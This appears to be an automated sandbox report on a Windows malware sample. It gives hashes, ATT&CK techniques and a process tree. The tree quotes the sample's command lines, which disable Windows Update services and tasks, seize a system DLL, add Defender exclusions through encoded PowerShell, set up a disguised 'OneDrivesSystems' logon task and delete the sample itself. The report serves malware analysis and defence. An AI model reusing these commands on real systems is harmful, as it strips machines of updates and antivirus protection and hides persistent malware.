5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07

General

Target

5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
Size

2.2MB
MD5

d5dfb8447ced11274942ace31b4279d8
SHA1

5a1b36ef9db72321b3d075712a8888bd921a472c
SHA256

5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07
SHA512

92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde
SSDEEP

49152:NZMzod1k0XlJTfu7lCwMBLEUGu20S2hnnRYKiPCZYj8bkN2P:N2C1k+bMlCwWl2qhnnRYKECZYI44

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Drops file in Drivers directory 2 IoCs

Processes:

5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exeupdates.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updates.exe

Executes dropped EXE 1 IoCs

Processes:

updates.exe

pid process

868 updates.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

948 icacls.exe
684 takeown.exe
572 icacls.exe
1404 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

schtasks.exe

pid process

532 schtasks.exe
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1600 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

572 icacls.exe
1404 takeown.exe
948 icacls.exe
684 takeown.exe

pid	process
868	updates.exe

pid	process
948	icacls.exe
684	takeown.exe
572	icacls.exe
1404	takeown.exe

pid	process
532	schtasks.exe

pid	process
1600	taskeng.exe

pid	process
572	icacls.exe
1404	takeown.exe
948	icacls.exe
684	takeown.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowercfg.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powercfg.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1408 sc.exe
752 sc.exe
1412 sc.exe
1156 sc.exe
364 sc.exe
456 sc.exe
1528 sc.exe
1908 sc.exe
580 sc.exe
572 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2036 schtasks.exe
1208 schtasks.exe

pid	process
1408	sc.exe
752	sc.exe
1412	sc.exe
1156	sc.exe
364	sc.exe
456	sc.exe
1528	sc.exe
1908	sc.exe
580	sc.exe
572	sc.exe

pid	process
2036	schtasks.exe
1208	schtasks.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1968	reg.exe
1360	reg.exe
832	reg.exe
2000	reg.exe
1088	reg.exe
2032	reg.exe
1504	reg.exe
1108	reg.exe
2028	reg.exe
2036	reg.exe
1136	reg.exe
2024	reg.exe
364	reg.exe
1924	reg.exe
1112	reg.exe
2040	reg.exe
1308	reg.exe
1976	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exepowercfg.exe

pid process

948 powershell.exe
1832 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
332 powercfg.exe

pid	process
948	powershell.exe
1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
332	powercfg.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exeupdates.exepowercfg.exepowercfg.exepowercfg.exetakeown.exe5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	948	powershell.exe
Token: SeShutdownPrivilege	868	updates.exe
Token: SeShutdownPrivilege	1548	powercfg.exe
Token: SeShutdownPrivilege	332	powercfg.exe
Token: SeShutdownPrivilege	1636	powercfg.exe
Token: SeTakeOwnershipPrivilege	684	takeown.exe
Token: SeDebugPrivilege	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
Token: SeDebugPrivilege	332	powercfg.exe
Token: SeShutdownPrivilege	1072	powercfg.exe
Token: SeShutdownPrivilege	836	powercfg.exe
Token: SeShutdownPrivilege	896	powercfg.exe
Token: SeShutdownPrivilege	1840	powercfg.exe
Token: SeTakeOwnershipPrivilege	1404	takeown.exe
Token: SeDebugPrivilege	868	updates.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.execmd.execmd.exereg.execmd.exe

description	pid	process	target process
PID 1832 wrote to memory of 948	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	powershell.exe
PID 1832 wrote to memory of 948	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	powershell.exe
PID 1832 wrote to memory of 948	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	powershell.exe
PID 1832 wrote to memory of 1976	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 1832 wrote to memory of 1976	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 1832 wrote to memory of 1976	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 1832 wrote to memory of 1496	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 1832 wrote to memory of 1496	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 1832 wrote to memory of 1496	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 1976 wrote to memory of 364	1976	cmd.exe	sc.exe
PID 1976 wrote to memory of 364	1976	cmd.exe	sc.exe
PID 1976 wrote to memory of 364	1976	cmd.exe	sc.exe
PID 1976 wrote to memory of 1156	1976	cmd.exe	sc.exe
PID 1976 wrote to memory of 1156	1976	cmd.exe	sc.exe
PID 1976 wrote to memory of 1156	1976	cmd.exe	sc.exe
PID 1496 wrote to memory of 868	1496	cmd.exe	updates.exe
PID 1496 wrote to memory of 868	1496	cmd.exe	updates.exe
PID 1496 wrote to memory of 868	1496	cmd.exe	updates.exe
PID 1976 wrote to memory of 1528	1976	cmd.exe	sc.exe
PID 1976 wrote to memory of 1528	1976	cmd.exe	sc.exe
PID 1976 wrote to memory of 1528	1976	cmd.exe	sc.exe
PID 1496 wrote to memory of 1548	1496	cmd.exe	powercfg.exe
PID 1496 wrote to memory of 1548	1496	cmd.exe	powercfg.exe
PID 1496 wrote to memory of 1548	1496	cmd.exe	powercfg.exe
PID 1976 wrote to memory of 1412	1976	cmd.exe	sc.exe
PID 1976 wrote to memory of 1412	1976	cmd.exe	sc.exe
PID 1976 wrote to memory of 1412	1976	cmd.exe	sc.exe
PID 1832 wrote to memory of 1628	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 1832 wrote to memory of 1628	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 1832 wrote to memory of 1628	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 1496 wrote to memory of 332	1496	cmd.exe	powercfg.exe
PID 1496 wrote to memory of 332	1496	cmd.exe	powercfg.exe
PID 1496 wrote to memory of 332	1496	cmd.exe	powercfg.exe
PID 1976 wrote to memory of 752	1976	reg.exe	sc.exe
PID 1976 wrote to memory of 752	1976	reg.exe	sc.exe
PID 1976 wrote to memory of 752	1976	reg.exe	sc.exe
PID 1976 wrote to memory of 832	1976	reg.exe	reg.exe
PID 1976 wrote to memory of 832	1976	reg.exe	reg.exe
PID 1976 wrote to memory of 832	1976	reg.exe	reg.exe
PID 1496 wrote to memory of 1636	1496	cmd.exe	powercfg.exe
PID 1496 wrote to memory of 1636	1496	cmd.exe	powercfg.exe
PID 1496 wrote to memory of 1636	1496	cmd.exe	powercfg.exe
PID 1628 wrote to memory of 1208	1628	cmd.exe	schtasks.exe
PID 1628 wrote to memory of 1208	1628	cmd.exe	schtasks.exe
PID 1628 wrote to memory of 1208	1628	cmd.exe	schtasks.exe
PID 1976 wrote to memory of 1504	1976	reg.exe	schtasks.exe
PID 1976 wrote to memory of 1504	1976	reg.exe	schtasks.exe
PID 1976 wrote to memory of 1504	1976	reg.exe	schtasks.exe
PID 1976 wrote to memory of 1360	1976	reg.exe	reg.exe
PID 1976 wrote to memory of 1360	1976	reg.exe	reg.exe
PID 1976 wrote to memory of 1360	1976	reg.exe	reg.exe
PID 1976 wrote to memory of 1924	1976	reg.exe	reg.exe
PID 1976 wrote to memory of 1924	1976	reg.exe	reg.exe
PID 1976 wrote to memory of 1924	1976	reg.exe	reg.exe
PID 1976 wrote to memory of 1968	1976	reg.exe	reg.exe
PID 1976 wrote to memory of 1968	1976	reg.exe	reg.exe
PID 1976 wrote to memory of 1968	1976	reg.exe	reg.exe
PID 1976 wrote to memory of 684	1976	reg.exe	takeown.exe
PID 1976 wrote to memory of 684	1976	reg.exe	takeown.exe
PID 1976 wrote to memory of 684	1976	reg.exe	takeown.exe
PID 1976 wrote to memory of 572	1976	reg.exe	sc.exe
PID 1976 wrote to memory of 572	1976	reg.exe	sc.exe
PID 1976 wrote to memory of 572	1976	reg.exe	sc.exe
PID 1832 wrote to memory of 456	1832	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
"C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeAB0AHoAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHQAYwBuAGcAIwA+ACAAQAAoACAAPAAjAHIAagAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaABzAGoAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbwB1ACMAPgA="
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe"
2⤵
PID:532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "OneDrivesSystems"
2⤵
PID:456

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "OneDrivesSystems" /tr "\"C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe\""
2⤵
- Suspicious use of WriteProcessMemory
PID:1628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1496

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
PID:868

C:\Windows\system32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:1528

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "OneDrivesSystems" /tr "\"C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe\""
1⤵
- Creates scheduled task(s)
PID:1208

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:684

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:572

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
1⤵
- Modifies registry key
PID:1968

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
1⤵
- Modifies registry key
PID:1924

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
1⤵
- Modifies security service
- Modifies registry key
PID:1360

C:\Windows\system32\taskeng.exe
taskeng.exe {74FF19AF-4F12-4C77-87B7-6D8D637C0915} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
PID:1600

C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeAB0AHoAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHQAYwBuAGcAIwA+ACAAQAAoACAAPAAjAHIAagAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaABzAGoAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbwB1ACMAPgA="
3⤵
PID:332

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1596

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1908

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:580

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies registry key
PID:2028

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:2000

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:2024

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:2040

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1404

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:948

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:1088

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:572

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:456

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1408

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1308

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:364

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2032

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:584

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:672

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1964

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:1612

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
- Deletes itself
PID:532

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1504

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1296

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:1952

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:836

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:896

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "OneDrivesSystems" /tr "\"C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe\""
3⤵
PID:992

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "OneDrivesSystems" /tr "\"C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe\""
4⤵
- Creates scheduled task(s)
PID:2036

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "stopjduuhfz"
3⤵
PID:1492

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
1⤵
PID:1612

C:\Windows\system32\schtasks.exe
schtasks /run /tn "OneDrivesSystems"
1⤵
PID:912

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
1⤵
- Modifies registry key
PID:1504

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
1⤵
PID:1308

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
1⤵
PID:1728

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
1⤵
PID:1824

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
1⤵
PID:1956

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
1⤵
PID:1716

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
1⤵
PID:1920

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
1⤵
PID:2020

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:2036

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:1112

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:1108

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:1136

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
1⤵
- Modifies registry key
PID:832

C:\Windows\system32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:752

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:332

C:\Windows\system32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:1412

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:1156

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:364

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

2

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
Filesize
2.2MB

MD5
d5dfb8447ced11274942ace31b4279d8

SHA1
5a1b36ef9db72321b3d075712a8888bd921a472c

SHA256
5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07

SHA512
92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde

Download Submit
C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
Filesize
2.2MB

MD5
d5dfb8447ced11274942ace31b4279d8

SHA1
5a1b36ef9db72321b3d075712a8888bd921a472c

SHA256
